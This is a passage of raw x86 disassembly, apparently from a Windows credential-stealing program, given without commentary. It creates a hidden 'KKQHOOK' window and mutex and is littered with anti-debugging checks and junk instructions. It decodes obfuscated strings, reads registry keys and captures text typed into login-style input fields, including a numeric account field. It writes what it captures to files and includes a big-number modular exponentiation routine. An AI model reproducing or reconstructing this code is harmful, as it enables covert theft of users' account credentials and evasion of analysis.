mov [ebp+var_45], eax
lea eax, sub_40B525
mov [ebp+var_51], eax
push 7F00h
push 0
call sub_40CBF0 ; LoadCursorA
mov [ebp+var_3D], eax
call sub_40CA58 ; IsDebuggerPresent
push 7F03h
push 0
call sub_40CC08 ; LoadIconA
mov [ebp+var_41], eax
call sub_40C998 ; GetProcessHeap
and [ebp+var_35], 0
push 0
call sub_40CCEC ; GetStockObject
mov [ebp+var_39], eax
mov [ebp+var_282], 1AB1h
inc [ebp+var_282]
mov [ebp+var_55], 3
and [ebp+var_4D], 0
and [ebp+var_49], 0
lea eax, [ebp+var_55]
push eax
call sub_40CC98 ; RegisterClassA
call sub_40C998 ; GetProcessHeap
push 0
push ds:dword_41E9AC
push 0
push 0
push 0
push 0
push 0
push 0
push 0CA0000h
push offset aKkqhook ; "KKQHOOK"
push offset aKkqhook ; "KKQHOOK"
push 0
call sub_40CCBC ; CreateWindowExA
mov ds:dword_41C7D8, eax
push offset aKkqhook_30 ; "KKQHOOK_30"
push 0
push 0
call sub_40CB54 ; CreateMutexA
call sub_40C944 ; GetCurrentThreadId
push 2
call sub_402B9B
add esp, 70h
mov ebx, 4F95h
mov eax, ebx
add eax, ebx
mov ebx, eax
call sub_40C9D4 ; GetVersion
cmp eax, 80000000h
jb short loc_40B14E
mov dword ptr [ebp-7C4h], 1AA7h
inc dword ptr [ebp-7C4h]
push 0Ch
push offset aDes ; "ۄ"
call sub_40129C
push eax
call sub_40C980 ; GetModuleHandleA
mov edi, eax
push 16h
push offset aXFC ; ""
call sub_40129C
add esp, 10h
push eax
push edi
call sub_40C98C ; GetProcAddress
mov [ebp+var_7CC], eax
call sub_40C938 ; GetCurrentProcessId
mov edi, 3
sub edi, dword_43C094
push edi
push eax
call [ebp+var_7CC]
mov [ebp+var_7C8], 282Dh
add [ebp+var_7C8], 6908h
loc_40B14E: ; CODE XREF: sub_40AB84+55C�j
lea edi, [ebp+var_79F]
lea esi, aAlnb ; "<alNB"
mov ecx, 3
rep movsw
push 104h
lea eax, [ebp+var_56C]
push eax
push 0
call sub_40C974 ; GetModuleFileNameA
call sub_40C998 ; GetProcessHeap
lea eax, [ebp+var_56C]
push eax
call sub_403530
call sub_40C998 ; GetProcessHeap
push offset dword_41FC40
call sub_403530
call sub_40C944 ; GetCurrentThreadId
push offset dword_40F270
call sub_403530
push offset dword_40E070
call sub_403530
lea edi, [ebp+var_7A2]
lea esi, aE ; " E"
mov ecx, 3
rep movsb
call sub_40C938 ; GetCurrentProcessId
push eax
call sub_4037FA
call sub_40C9D4 ; GetVersion
lea edi, [ebp+var_7AA]
lea esi, aGxVY ; "X= <Y"
mov ecx, 2
rep movsd
lea eax, [ebp+var_2E6]
push eax
call sub_403AED
call sub_40C968 ; RtlGetLastWin32Error
and [ebp+var_350], 0
mov [ebp+var_354], 64h
call sub_40C938 ; GetCurrentProcessId
push 45h
push offset byte_446BAD
call sub_40129C
lea edi, [ebp+var_350]
push edi
lea edi, [ebp+var_354]
push edi
lea edi, [ebp+var_34A]
push edi
lea edi, [ebp+var_2E6]
push edi
push eax
push 80000002h
call sub_4014CB
call sub_40CA58 ; IsDebuggerPresent
push 1
push offset byte_446BAB
call sub_40129C
push eax
lea edi, [ebp+var_34A]
push edi
call sub_4038DA
push 1
push offset byte_446BA9
call sub_40129C
push eax
lea edi, [ebp+var_2E6]
push edi
call sub_4038DA
call sub_40C998 ; GetProcessHeap
lea edi, [ebp+var_7B2]
lea esi, aLke4me ; " lkE4me"
mov ecx, 2
rep movsd
push 17h
push offset byte_446B91
call sub_40129C
lea edi, [ebp+var_34A]
push edi
push eax
lea edi, [ebp+var_76A]
push edi
call sub_40CE54
mov [ebp+var_356], 0D4Dh
sub [ebp+var_356], 37Dh
lea eax, [ebp+var_350]
push eax
lea eax, [ebp+var_354]
push eax
lea eax, [ebp+var_66B]
push eax
push 0
lea eax, [ebp+var_76A]
push eax
push 80000000h
call sub_4014CB
mov [ebp+var_357], 4Fh
sub [ebp+var_357], 9Ah
lea eax, [ebp+var_66B]
push eax
call sub_403530
call sub_403BBF
call sub_40C9D4 ; GetVersion
push offset sub_408165
call sub_40802E
add esp, 8Ch
lea eax, [ebp+var_7B8]
push eax
push 0
push 0
push offset sub_409A96
push 0
push 0
call sub_40CB84 ; CreateThread
push eax
call sub_40C9B0 ; CloseHandle
call sub_40CA58 ; IsDebuggerPresent
push 0
mov eax, dword_43C098
mov edx, eax
add edx, 1E9h
push edx
mov edx, 0Ch
sub edx, eax
push edx
push ds:dword_41C7D8
call sub_40CBFC ; SetTimer
call sub_40C998 ; GetProcessHeap
jmp short loc_40B3AC
; ---------------------------------------------------------------------------
loc_40B369: ; CODE XREF: sub_40AB84+839�j
mov dword ptr [ebp-7C4h], 13EFh
mov eax, [ebp-7C4h]
mov edx, eax
add edx, eax
mov [ebp-7C4h], edx
lea eax, [ebp+var_1D]
push eax
call sub_40CC68 ; TranslateMessage
mov word ptr [ebp+var_7C8+2], 5116h
add word ptr [ebp+var_7C8+2], 3A9Eh
lea eax, [ebp+var_1D]
push eax
call sub_40CC74 ; DispatchMessageA
call sub_40CA58 ; IsDebuggerPresent
loc_40B3AC: ; CODE XREF: sub_40AB84+7E3�j
push 0
push 0
push 0
lea eax, [ebp+var_1D]
push eax
call sub_40CC20 ; GetMessageA
or eax, eax
jnz short loc_40B369
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40AB84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B3C6 proc near ; DATA XREF: sub_408FEB+9D7�o
; sub_408FEB+A13�o ...
var_23 = byte ptr -23h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_13 = byte ptr -13h
var_10 = byte ptr -10h
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov [ebp+var_A], 489h
movzx eax, [ebp+var_A]
imul eax, 56B5h
mov [ebp+var_A], ax
mov eax, [ebp+arg_4]
cmp eax, 100h
jz short loc_40B3FA
jmp loc_40B484
; ---------------------------------------------------------------------------
call sub_40C968 ; RtlGetLastWin32Error
loc_40B3FA: ; CODE XREF: sub_40B3C6+28�j
mov ax, word_446AAA
mov [ebp+var_1C], ax
cmp [ebp+arg_8], 9
jnz short loc_40B484
mov [ebp+var_1A], 0F2Ah
movzx eax, [ebp+var_1A]
imul eax, 1D80h
mov [ebp+var_1A], ax
cmp ebx, ds:dword_410890
jnz short loc_40B431
push ds:dword_432FB4
call sub_40CBD8 ; SetFocus
loc_40B431: ; CODE XREF: sub_40B3C6+5E�j
call sub_40C9C8 ; GetTickCount
cmp ebx, ds:dword_432FB4
jnz short loc_40B449
push ds:dword_41E9A4
call sub_40CBD8 ; SetFocus
loc_40B449: ; CODE XREF: sub_40B3C6+76�j
lea edi, [ebp+var_23]
lea esi, aEHzR ; "E|hz!R"
mov ecx, 7
rep movsb
cmp ebx, ds:dword_41E9A4
jnz short loc_40B46C
push ds:dword_41E99C
call sub_40CBD8 ; SetFocus
loc_40B46C: ; CODE XREF: sub_40B3C6+99�j
cmp ebx, ds:dword_41E99C
jnz short loc_40B47F
push ds:dword_432FB4
call sub_40CBD8 ; SetFocus
loc_40B47F: ; CODE XREF: sub_40B3C6+AC�j
call sub_40C944 ; GetCurrentThreadId
loc_40B484: ; CODE XREF: sub_40B3C6+2A�j
; sub_40B3C6+42�j
and [ebp+var_4], 0
cmp ebx, ds:dword_432FB4
jnz short loc_40B498
mov eax, ds:dword_41FC38
mov [ebp+var_4], eax
loc_40B498: ; CODE XREF: sub_40B3C6+C8�j
lea edi, [ebp+var_10]
lea esi, aPeck ; " PEck"
mov ecx, 3
rep movsw
cmp ebx, ds:dword_41E9A4
jnz short loc_40B4B9
mov eax, ds:dword_41E9A0
mov [ebp+var_4], eax
loc_40B4B9: ; CODE XREF: sub_40B3C6+E9�j
call sub_40C944 ; GetCurrentThreadId
cmp ebx, ds:dword_410890
jnz short loc_40B4CE
mov eax, ds:dword_40E060
mov [ebp+var_4], eax
loc_40B4CE: ; CODE XREF: sub_40B3C6+FE�j
lea edi, [ebp+var_13]
lea esi, aQ_0 ; "-Q"
mov ecx, 3
rep movsb
cmp ebx, ds:dword_41E99C
jnz short loc_40B4EE
mov eax, ds:dword_413E00
mov [ebp+var_4], eax
loc_40B4EE: ; CODE XREF: sub_40B3C6+11E�j
call sub_40C998 ; GetProcessHeap
cmp [ebp+var_4], 0
jz short loc_40B50D
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
push [ebp+var_4]
call sub_40CB90 ; CallWindowProcA
jmp short loc_40B51E
; ---------------------------------------------------------------------------
loc_40B50D: ; CODE XREF: sub_40B3C6+131�j
mov [ebp+var_8], 7A55h
mov eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov [ebp+var_8], edx
loc_40B51E: ; CODE XREF: sub_40B3C6+145�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B3C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B525 proc near ; DATA XREF: sub_40AB84+48F�o
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = byte ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = byte ptr -248h
var_241 = byte ptr -241h
var_142 = word ptr -142h
var_140 = byte ptr -140h
var_13F = dword ptr -13Fh
var_13B = dword ptr -13Bh
var_137 = byte ptr -137h
var_136 = word ptr -136h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_11E = word ptr -11Eh
var_11C = dword ptr -11Ch
var_117 = byte ptr -117h
var_116 = byte ptr -116h
var_115 = byte ptr -115h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = word ptr -10Ch
var_109 = byte ptr -109h
var_108 = dword ptr -108h
var_104 = word ptr -104h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 288h
push ebx
push esi
push edi
call sub_40C9D4 ; GetVersion
mov eax, [ebp+arg_4]
cmp eax, 10h
jz loc_40B743
jg short loc_40B552
cmp eax, 2
jz loc_40B729
jmp loc_40BE05
; ---------------------------------------------------------------------------
loc_40B552: ; CODE XREF: sub_40B525+1D�j
cmp eax, 111h
jz loc_40B85A
cmp eax, 113h
jz short loc_40B59C
cmp eax, 111h
jl loc_40BE05
cmp eax, 138h
jz loc_40B76C
jmp loc_40BE05
; ---------------------------------------------------------------------------
mov [ebp+var_104], 1FBDh
movzx eax, [ebp+var_104]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_104], ax
loc_40B59C: ; CODE XREF: sub_40B525+3D�j
lea edi, [ebp+var_133]
lea esi, aFr0Im ; "fR0~Im"
mov ecx, 7
rep movsb
cmp dword_43C224, 0
jz loc_40B6F5
mov [ebp+var_24C], 3018h
sub [ebp+var_24C], 4628h
push 9
push offset dword_446E74
call sub_40129C
push eax
push dword_43C224
call sub_408F56
mov [ebp+var_258], eax
push 8
push offset byte_446E6B
call sub_40129C
push eax
push [ebp+var_258]
call sub_408F56
add esp, 20h
mov [ebp+var_25C], eax
lea edi, [ebp+var_264]
lea esi, aQXsq ; "/ q#xsq"
movsd
movsd
lea eax, [ebp+var_274]
push eax
push [ebp+var_25C]
call sub_40CBA8 ; GetWindowRect
or eax, eax
jz loc_40B6F5
mov word ptr [ebp+var_250+2], 5BFDh
inc word ptr [ebp+var_250+2]
lea eax, [ebp+var_284]
push eax
push ds:dword_41FD44
call sub_40CBA8 ; GetWindowRect
or eax, eax
jz loc_40B6F5
mov [ebp+var_254], 1CFAh
mov eax, 1D12h
mul [ebp+var_254]
mov [ebp+var_288], eax
mov [ebp+var_254], eax
mov eax, [ebp+var_26C]
sub eax, [ebp+var_274]
sub eax, 4
mov edx, [ebp+var_27C]
sub edx, [ebp+var_284]
cmp eax, edx
jnz short loc_40B6C0
mov eax, [ebp+var_268]
sub eax, [ebp+var_270]
sub eax, 4
mov edx, [ebp+var_278]
sub edx, [ebp+var_280]
cmp eax, edx
jz short loc_40B6F5
loc_40B6C0: ; CODE XREF: sub_40B525+17A�j
call sub_40C938 ; GetCurrentProcessId
push 1
mov eax, [ebp+var_268]
sub eax, [ebp+var_270]
push eax
mov eax, [ebp+var_26C]
sub eax, [ebp+var_274]
push eax
push 0
push 0
push ds:dword_41FD44
call sub_40CCD4 ; MoveWindow
call sub_40C9D4 ; GetVersion
loc_40B6F5: ; CODE XREF: sub_40B525+91�j
; sub_40B525+10C�j ...
cmp dword_43C220, 0
jz loc_40BE28
call sub_40C998 ; GetProcessHeap
mov eax, dword_43C220
mov dword_43C224, eax
and dword_43C220, 0
push eax
call sub_408FEB
pop ecx
call sub_40C938 ; GetCurrentProcessId
jmp loc_40BE28
; ---------------------------------------------------------------------------
loc_40B729: ; CODE XREF: sub_40B525+22�j
mov eax, ds:dword_41C7D8
cmp [ebp+arg_0], eax
jnz loc_40BE28
push 0
call sub_40CCA4 ; PostQuitMessage
jmp loc_40BE28
; ---------------------------------------------------------------------------
loc_40B743: ; CODE XREF: sub_40B525+17�j
mov eax, ds:dword_41C7D8
cmp [ebp+arg_0], eax
jnz short loc_40B755
push [ebp+arg_0]
call sub_40CCC8 ; DestroyWindow
loc_40B755: ; CODE XREF: sub_40B525+226�j
mov [ebp+var_10C], 6A07h
sub [ebp+var_10C], 13B3h
jmp loc_40BE28
; ---------------------------------------------------------------------------
loc_40B76C: ; CODE XREF: sub_40B525+4F�j
mov eax, [ebp+arg_C]
mov [ebp+var_12C], eax
call sub_40C9C8 ; GetTickCount
mov eax, [ebp+var_12C]
cmp eax, ds:dword_432FAC
jz short loc_40B7B4
cmp eax, ds:dword_413E04
jz short loc_40B7B4
cmp eax, ds:dword_41B7BC
jz short loc_40B7B4
cmp eax, ds:dword_4351E4
jz short loc_40B7B4
cmp eax, ds:dword_432FB0
jz short loc_40B7B4
cmp eax, ds:dword_43A498
jnz loc_40BE28
loc_40B7B4: ; CODE XREF: sub_40B525+261�j
; sub_40B525+269�j ...
call sub_40C968 ; RtlGetLastWin32Error
mov eax, [ebp+var_12C]
cmp eax, ds:dword_432FB0
jz short loc_40B7CF
cmp eax, ds:dword_43A498
jnz short loc_40B7DE
loc_40B7CF: ; CODE XREF: sub_40B525+2A0�j
push 1010B0h
push [ebp+arg_8]
call sub_40CD04 ; SetTextColor
jmp short loc_40B7E8
; ---------------------------------------------------------------------------
loc_40B7DE: ; CODE XREF: sub_40B525+2A8�j
push 0
push [ebp+arg_8]
call sub_40CD04 ; SetTextColor
loc_40B7E8: ; CODE XREF: sub_40B525+2B7�j
mov byte ptr [ebp+var_24C+1], 0CCh
add byte ptr [ebp+var_24C+1], 1
push 0FFFFFFh
push [ebp+arg_8]
call sub_40CCF8 ; SetBkColor
mov word ptr [ebp+var_24C+2], 3240h
movzx eax, word ptr [ebp+var_24C+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_24C+2], ax
and [ebp+var_260], 0
and [ebp+var_25C], 0
lea eax, [ebp+var_260]
push eax
call sub_40CD10 ; CreateBrushIndirect
mov [ebp+var_254], eax
jmp loc_40BE28
; ---------------------------------------------------------------------------
mov [ebp+var_250], 73F9h
inc [ebp+var_250]
jmp loc_40BE28
; ---------------------------------------------------------------------------
loc_40B85A: ; CODE XREF: sub_40B525+32�j
lea edi, [ebp+var_134]
lea esi, byte_446ACB
xor ecx, ecx
inc ecx
rep movsb
push 2
push offset word_446B8E
call sub_40129C
push offset byte_434080
push eax
lea edi, [ebp+var_241]
push edi
call sub_40CE54
add esp, 14h
mov ax, word_446ACC
mov [ebp+var_136], ax
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_432FB4
call sub_40CB9C ; GetWindowTextA
lea edi, [ebp+var_137]
lea esi, off_446ACE
xor ecx, ecx
inc ecx
rep movsb
cmp [ebp+var_FF], 0
jnz short loc_40B91D
call sub_40C998 ; GetProcessHeap
push 1Fh
push offset word_446B6E
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40CC14 ; MessageBoxA
lea edi, [ebp+var_250+3]
lea esi, off_446ACE+1
mov ecx, 3
rep movsb
push ds:dword_432FB4
call sub_40CBD8 ; SetFocus
mov word ptr [ebp+var_24C+2], 2A2Dh
inc word ptr [ebp+var_24C+2]
jmp loc_40BE28
; ---------------------------------------------------------------------------
loc_40B91D: ; CODE XREF: sub_40B525+3A3�j
push 5
push offset aTCt ; "ė"
call sub_40129C
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_241]
push edi
push eax
lea edi, [ebp+var_241]
push edi
call sub_40CE54
add esp, 18h
mov eax, dword_446AD2
mov [ebp+var_13B], eax
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_41E9A4
call sub_40CB9C ; GetWindowTextA
mov eax, dword_446AD6
mov [ebp+var_13F], eax
cmp [ebp+var_FF], 0
jnz short loc_40B9DA
call sub_40C9C8 ; GetTickCount
push 1Eh
push offset byte_446B49
call sub_40129C
add esp, 8
push 0
push 0
push eax
push 0
call sub_40CC14 ; MessageBoxA
mov byte ptr [ebp+var_24C+3], 3
movzx eax, byte ptr [ebp+var_24C+3]
imul eax, 1F7Ah
mov byte ptr [ebp+var_24C+3], al
push ds:dword_41E9A4
call sub_40CBD8 ; SetFocus
lea edi, [ebp+var_250]
lea esi, aYrJ4? ; "yR j4?"
mov ecx, 7
rep movsb
jmp loc_40BE28
; ---------------------------------------------------------------------------
loc_40B9DA: ; CODE XREF: sub_40B525+456�j
push 5
push offset aTT ; "Ě"
call sub_40129C
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_241]
push edi
push eax
lea edi, [ebp+var_241]
push edi
call sub_40CE54
add esp, 18h
mov [ebp+var_108], 3054h
mov eax, [ebp+var_108]
mov edx, eax
add edx, eax
mov [ebp+var_108], edx
push 0FFh
lea eax, [ebp+var_FF]
push eax
push ds:dword_41E99C
call sub_40CB9C ; GetWindowTextA
cmp [ebp+var_FF], 0
jz loc_40BB90
lea edi, [ebp+var_140]
lea esi, byte_446AE1
xor ecx, ecx
inc ecx
rep movsb
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40BA5C: ; CODE XREF: sub_40B525+53C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40BA5C
cmp eax, 4
jb loc_40BB90
mov [ebp+var_110], 4F96h
add [ebp+var_110], 1BCDh
mov [ebp+var_101], 0
jmp short loc_40BAAB
; ---------------------------------------------------------------------------
loc_40BA89: ; CODE XREF: sub_40B525+59F�j
movzx eax, [ebp+var_101]
mov al, [ebp+eax+var_FF]
cmp al, 30h
jl short loc_40BA9F
cmp al, 39h
jle short loc_40BAA4
loc_40BA9F: ; CODE XREF: sub_40B525+574�j
jmp loc_40BB90
; ---------------------------------------------------------------------------
loc_40BAA4: ; CODE XREF: sub_40B525+578�j
add [ebp+var_101], 1
loc_40BAAB: ; CODE XREF: sub_40B525+562�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40BAB4: ; CODE XREF: sub_40B525+594�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40BAB4
movzx esi, [ebp+var_101]
cmp esi, eax
jb short loc_40BA89
mov [ebp+var_100], 0
jmp loc_40BB6C
; ---------------------------------------------------------------------------
loc_40BAD2: ; CODE XREF: sub_40B525+660�j
lea edi, [ebp+var_250+1]
lea esi, a_Wqj ; ". wQj"
mov ecx, 3
rep movsw
call sub_40C998 ; GetProcessHeap
mov al, [ebp+var_100]
mov byte ptr [ebp+var_24C+3], al
jmp short loc_40BB22
; ---------------------------------------------------------------------------
loc_40BAF9: ; CODE XREF: sub_40B525+616�j
movzx eax, byte ptr [ebp+var_24C+3]
movsx eax, [ebp+eax+var_FF]
movzx edx, [ebp+var_100]
movsx edx, [ebp+edx+var_FF]
cmp eax, edx
jnz short loc_40BB3D
add byte ptr [ebp+var_24C+3], 1
loc_40BB22: ; CODE XREF: sub_40B525+5D2�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40BB2B: ; CODE XREF: sub_40B525+60B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40BB2B
movzx esi, byte ptr [ebp+var_24C+3]
cmp esi, eax
jb short loc_40BAF9
loc_40BB3D: ; CODE XREF: sub_40B525+5F4�j
call sub_40C968 ; RtlGetLastWin32Error
movzx eax, byte ptr [ebp+var_24C+3]
movzx edx, [ebp+var_100]
sub eax, edx
cmp eax, 3
jg short loc_40BB90
lea edi, [ebp+var_258+1]
lea esi, aE?qK ; "e* ?Q k"
movsd
movsd
add [ebp+var_100], 1
loc_40BB6C: ; CODE XREF: sub_40B525+5A8�j
lea ecx, [ebp+var_FF]
or eax, 0FFFFFFFFh
loc_40BB75: ; CODE XREF: sub_40B525+655�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40BB75
movzx esi, [ebp+var_100]
cmp esi, eax
jb loc_40BAD2
jmp loc_40BC22
; ---------------------------------------------------------------------------
loc_40BB90: ; CODE XREF: sub_40B525+517�j
; sub_40B525+541�j ...
mov eax, dword_43C098
add eax, 7C5h
push eax
call sub_40CDDC
mov [ebp+var_114], 1022h
mov eax, 50Ah
mul [ebp+var_114]
mov [ebp+var_24C], eax
mov [ebp+var_114], eax
push 35h
push offset byte_446B0D
call sub_40129C
mov [ebp+var_250], eax
push 13h
push offset aTCC ; "җؗ"
call sub_40129C
add esp, 14h
push 0
push eax
mov edi, [ebp+var_250]
push edi
push 0
call sub_40CC14 ; MessageBoxA
mov [ebp+var_115], 0E0h
movzx eax, [ebp+var_115]
imul eax, 6D4Dh
mov [ebp+var_115], al
push ds:dword_41E99C
call sub_40CBD8 ; SetFocus
call sub_40C944 ; GetCurrentThreadId
jmp loc_40BE28
; ---------------------------------------------------------------------------
loc_40BC22: ; CODE XREF: sub_40B525+666�j
push 5
push offset aTCt ; "ė"
call sub_40129C
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_241]
push edi
push eax
lea edi, [ebp+var_241]
push edi
call sub_40CE54
add esp, 18h
mov [ebp+var_116], 8
sub [ebp+var_116], 18h
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_41FC40
call sub_40CAD0 ; CreateFileA
mov [ebp+var_128], eax
push 2
push 0
push 0
push eax
call sub_40CADC ; SetFilePointer
lea ecx, [ebp+var_241]
or eax, 0FFFFFFFFh
loc_40BC8E: ; CODE XREF: sub_40B525+76E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40BC8E
push 0
lea esi, [ebp+var_248]
push esi
push eax
lea edi, [ebp+var_241]
push edi
push [ebp+var_128]
call sub_40CB48 ; WriteFile
mov [ebp+var_117], 88h
sub [ebp+var_117], 42h
push 2
push offset word_446AF6
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_248]
push edi
mov edi, 0Dh
sub edi, dword_43C098
push edi
push eax
push [ebp+var_128]
call sub_40CB48 ; WriteFile
call sub_40C9D4 ; GetVersion
push [ebp+var_128]
call sub_40C9B0 ; CloseHandle
call sub_40C938 ; GetCurrentProcessId
push ds:dword_41FD44
call sub_40CCC8 ; DestroyWindow
mov [ebp+var_11C], 2CF6h
sub [ebp+var_11C], 28E3h
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_40F270
call sub_40CAD0 ; CreateFileA
mov [ebp+var_128], eax
push 2
push 0
push 0
push [ebp+var_128]
call sub_40CADC ; SetFilePointer
mov [ebp+var_109], 0BEh
movzx eax, [ebp+var_109]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_109], al
lea ecx, byte_434080
or eax, 0FFFFFFFFh
loc_40BD76: ; CODE XREF: sub_40B525+856�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40BD76
mov edi, eax
push 0
lea esi, [ebp+var_248]
push esi
push edi
push offset byte_434080
push [ebp+var_128]
call sub_40CB48 ; WriteFile
mov [ebp+var_11E], 74D5h
inc [ebp+var_11E]
push 1
push offset byte_446AF4
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_248]
push edi
mov edi, 0Ch
sub edi, dword_43C098
push edi
push eax
push [ebp+var_128]
call sub_40CB48 ; WriteFile
mov ax, word_446AF0
mov [ebp+var_142], ax
push [ebp+var_128]
call sub_40C9B0 ; CloseHandle
call sub_40C9D4 ; GetVersion
push 5
push ds:dword_41D828
call sub_40CCB0 ; ShowWindow
jmp short loc_40BE28
; ---------------------------------------------------------------------------
loc_40BE05: ; CODE XREF: sub_40B525+28�j
; sub_40B525+44�j ...
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CCE0 ; DefWindowProcA
jmp short loc_40BE28
; ---------------------------------------------------------------------------
mov [ebp+var_124], 199Bh
inc [ebp+var_124]
loc_40BE28: ; CODE XREF: sub_40B525+1D7�j
; sub_40B525+1FF�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40B525 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BE30 proc near ; CODE XREF: sub_406EA8+29�p
; sub_406EA8+3E�p
jmp ds:dword_448340
sub_40BE30 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BE3C proc near ; CODE XREF: sub_405415+10F�p
jmp ds:dword_44834C
sub_40BE3C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BE48 proc near ; CODE XREF: sub_405415+18A�p
jmp ds:dword_448350
sub_40BE48 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BE54 proc near ; CODE XREF: sub_406A6B+78�p
jmp ds:dword_44835C
sub_40BE54 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BE60 proc near ; CODE XREF: sub_406A6B+48�p
jmp ds:dword_448360
sub_40BE60 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BE6C proc near ; CODE XREF: sub_406A6B+2F�p
jmp ds:dword_448364
sub_40BE6C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40BE78 proc near ; CODE XREF: sub_406A03+4D�p
jmp ds:dword_448368
sub_40BE78 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BE84 proc near ; CODE XREF: sub_40886E+19�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_447BBC
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_40BF4F
xor edx, edx
loc_40BEB4: ; CODE XREF: sub_40BE84+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_40BEC6
mov edx, [ebp+arg_4]
call sub_40BEE0
loc_40BEC6: ; CODE XREF: sub_40BE84+38�j
lea edx, dword_447BBC
call sub_40BEE0
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_40BEB4
popa
pop ebp
retn 10h
sub_40BE84 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BEE0 proc near ; CODE XREF: sub_40BE84+3D�p
; sub_40BE84+48�p
lea edi, dword_447B7C
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_447BBC
call sub_40BF4F
loc_40BEFA: ; CODE XREF: sub_40BEE0+5D�j
lea edi, dword_447B7C
mov ecx, 10h
xor eax, eax
loc_40BF07: ; CODE XREF: sub_40BEE0+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_40BF07
call sub_40BF60
bt dword_447BBC, ebx
jnb short loc_40BF3C
mov esi, edx
lea edi, dword_447B7C
xor eax, eax
mov ecx, 10h
loc_40BF2B: ; CODE XREF: sub_40BEE0+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BF2B
call sub_40BF60
loc_40BF3C: ; CODE XREF: sub_40BEE0+3A�j
dec ebx
jns short loc_40BEFA
mov edi, edx
lea esi, dword_447B7C
mov ecx, 10h
rep movsd
retn
sub_40BEE0 endp
; =============== S U B R O U T I N E =======================================
sub_40BF4F proc near ; CODE XREF: sub_40BE84+29�p
; sub_40BEE0+15�p
mov ebx, 1FFh
loc_40BF54: ; CODE XREF: sub_40BF4F+B�j
bt [edi], ebx
jb short locret_40BF5C
dec ebx
jnz short loc_40BF54
